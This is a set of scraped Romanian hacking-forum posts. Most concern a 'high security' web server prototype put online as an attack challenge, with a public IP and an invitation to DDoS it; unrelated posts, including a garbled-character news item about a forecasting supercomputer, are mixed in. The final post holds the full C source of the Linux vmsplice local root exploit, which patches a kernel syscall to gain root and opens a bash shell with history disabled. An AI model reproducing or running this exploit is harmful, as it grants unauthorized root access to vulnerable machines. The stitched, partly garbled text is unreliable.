PingLord

E un IIS versiune foarte veche.Teoretic ar trebui sa fie exploatabil destul de mult.

Dupa multe zile de intarziere,va postez versiunea 0.1 a serverului high security. Munca multa,nopti pierdute.Va urez distractie placuta. 216.227.221.193 PS : Nu are website inca...talentul meu de creare de website este nul,dar va urma si zilele urmatoare un website pentru distractie mai mare. Multumiri lui Tex pentru sfaturi si ajutor pe web app

Dupa multe zile de intarziere,va postez versiunea 0.1 a serverului high security. Munca multa,nopti pierdute.Va urez distractie placuta. 216.227.221.193 PS : Nu are website inca...talentul meu de creare de website este nul. Multumiri lui Tex pentru sfaturi si ajutor pe web app

Domnu Tex,inainte de locate sa dea si un updatedb ca sa fie sigur ca il gaseste.

Din pacate nu l-am pus online pentru ca vreau sa fac portie completa.Vreau sa pun si website cu baze de date ca sa incercati si sql si RFi si orice mai vreti voi.Din pacate o sa mai dureze ceva timp pentru ca suntem doar 2 oameni care muncim la asta si vrem sa demonstram neaparat conceptul de High Security Webserver,deci nu ne permitem greseli.

Ai dreptate...timeout.Vreau sa facem si un site pt sql injection si alte vulnerabilitati de tip web ca sa nu stau sa il schimb de 2-3 ori challenge-ul.

Serverul va fi pus online in 3-4 ore.Verficicati sectiunea challenge

Am dat mai multe exemple.Scuze tex.Acum sunt pe server si muncesc si in paralel...sunt un pic agitat si grabit.Lipseste coerenta la ora asta

Salutare, Dupa cum stiti am prezentat impreuna cu inca un coleg la DefCamp un prototip de server high security.Il promisesem pentru teste la sfarsitul saptamanii si sa dati in el dar va fi gata in 3 ore.Va rog sa dati cu DDOS in el si sa gasiti orice tip de vulnerabilitate la nivel de OS si Services.Cine gaseste o vulnerabilitate primeste un bilet la munte la Moeciu pentru revelion la 3 stele de pe 30 pana pe 2 cu mic dejun si cina inclus.Ramaneti aici pentru update-uri.

Eu sunt interesat.Fac si partea de administrare daca vrei.Pot sa bag si niste bani.Cel mai bine vorbim pe privat.

Ai fost la un pas sa il trimiti in lumea dreptilor ca erati toti blocati si am dat restart in firewall...deci nu se punea .Din cate am vorbit cu Dragos o sa il punem online la sfarsitul saptamanii pentru atacuri.Cine reuseste are un bilet de revelion la Moeciu la 3 stele de pe 30 pana pe 2.

Calduroasa ca ziua in care te-ai inscris pe forum.

@HellScream Zilele astea o sa incerc sa vad ce si cum.O sa pun ip-ul la challenge dar nu cred ca poate sta sus mai mult de o saptamana deoarece ip-ul este imprumutat sa zic asa:))

Criza economic? a afectat într-o m?sur? mai mare sau mai mic? majoritatea ??rilor de pe glob, iar pentru a preveni o nou? recesiune, la Institutul Federal de Tehnologie din Zurich, se lucreaz? la un supercomputer care va putea prezice dezastrele economice ?i naturale. The Living Earth Simulator Project (LES), în traducere "Simulatorul condi?iilor de via?? de pe P?mânt", poate prezice r?spândirea bolilor ?i crizele financiare, scrie dailymail.co.uk. Omul care a venit cu aceast? idee, profesorul Dirk Helbing de la Institutul Federal de Tehnologie din Zurich, descrie supercomputerul ca un sistem nervos al planetei. "Ideea este strângerea de informa?ii de la o gam? variat? de surse ?i analizarea lor folosind cele mai puternic computer. Multe dintre problemele cu care ne confrunt?m ast?zi, r?zboaie, boli, instabilit??i sociale ?i economice sunt legate de comportamentul uman, dar exist? o lips? de în?elegere în ceea ce prive?te modul de func?ionare a societ??ii ?i economiei în general", potrivit lui Helbing. Profesorul Helbing spune c? LES va putea prezice r?spândirea de boli precum gripa aviar?, va identifica metode de a rezolva problemele climatice ?i chiar o eventuala recesiune. Computerul va fi creat în a?a fel încât s? adune informa?ii de pe toate sursele posibile, atât de pe site-urile ?i statisticile guvernamentale, cât ?i de pe bloguri ?i re?ele de socializare, pentru a putea realiza o analiz? detaliat?. În jur de 30 de savan?i din întreaga lume sprijin? acest proiect ?i vor ajuta la crearea supercomputerului. Proiectul a fost deja pus în lista de priorit??i a Comisiei Europene care este preg?tit? s? ofere un miliard de euro pentru realizarea sa. SURSA : Se lucreaz? la SUPERCOMPUTERUL care va prezice urm?toarea recesiune - IT & C > Capital.ro

Daca sunteti mai multi interesati din cei care s-au prezentat la Iasi si au rezistat pana la prezentarea cu High Security Webserver as putea sa il mut in ip public sa mai incercati.Astept sa ziceti ce si cum.Nu il mut pentru 1-2 persoane...dar daca sunteti mai multi merita sa iau un ip public si sa il urc.

Tex,daca nu te superi,ce probleme ai intalnit pe cPanel/WHM ?

Cu cine te certi eth0??La ce te referi si la cine?

Orice banca este obligata sa fie asigurata de catre BNR.

Interesant ca exista ca si filtrat portul Elite,un vechi backdoor.

Daia nu puteam eu sa gasesc rute Bucuresti - Iasi pentru Defcamp

Nu conteaza numarul ci calitatea.Tot ce imi doresc este sa iasa proiectul si sa va captez cu prezentarea la care lucrez pentru aceasta conferinta.

Sau Linux si se rezolva orice problema de genu asta

Prietene,datoria se prescrie dupa un timp,adica se sterge.Fa fara grija.

Cam ce zice Swt conform printf-ului aferent din exploit

#define _GNU_SOURCE #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/uio.h> #define TARGET_PATTERN " sys_vm86old" #define TARGET_SYSCALL 113 #ifndef __NR_vmsplice #define __NR_vmsplice 316 #endif #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) #define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) #define TRAMP_CODE (void *) trampoline #define TRAMP_SIZE ( sizeof(trampoline) - 1 ) unsigned char trampoline[] = "\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ "\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ "\x75\x02" /* jne +2 */ "\xff\xd1" /* call *%ecx */ "\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ "\xc3" /* ret */ ; void die(char *msg, int err) { printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); fflush(stdout); fflush(stderr); exit(1); } long get_target() { FILE *f; long addr = 0; char line[128]; f = fopen("/proc/kallsyms", "r"); if (!f) die("/proc/kallsyms", errno); while (fgets(line, sizeof(line), f)) { if (strstr(line, TARGET_PATTERN)) { addr = strtoul(line, NULL, 16); break; } } fclose(f); return addr; } static inline __attribute__((always_inline)) void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movl %%esp, %%eax ;" "andl %1, %%eax ;" "movl (%%eax), %0" : "=r" (curr) : "i" (~8191) ); return (void *) curr; } static uint uid, gid; void kernel_code() { int i; uint *p = get_current(); for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } } int main(int argc, char *argv[]) { int pi[2]; long addr; struct iovec iov; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); addr = get_target(); printf("[+] addr: 0x%lx\n", addr); if (pipe(pi) < 0) die("pipe", errno); iov.iov_base = (void *) addr; iov.iov_len = TRAMP_SIZE; write(pi[1], TRAMP_CODE, TRAMP_SIZE); _vmsplice(pi[0], &iov, 1, 0); gimmeroot(); if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); return 0; }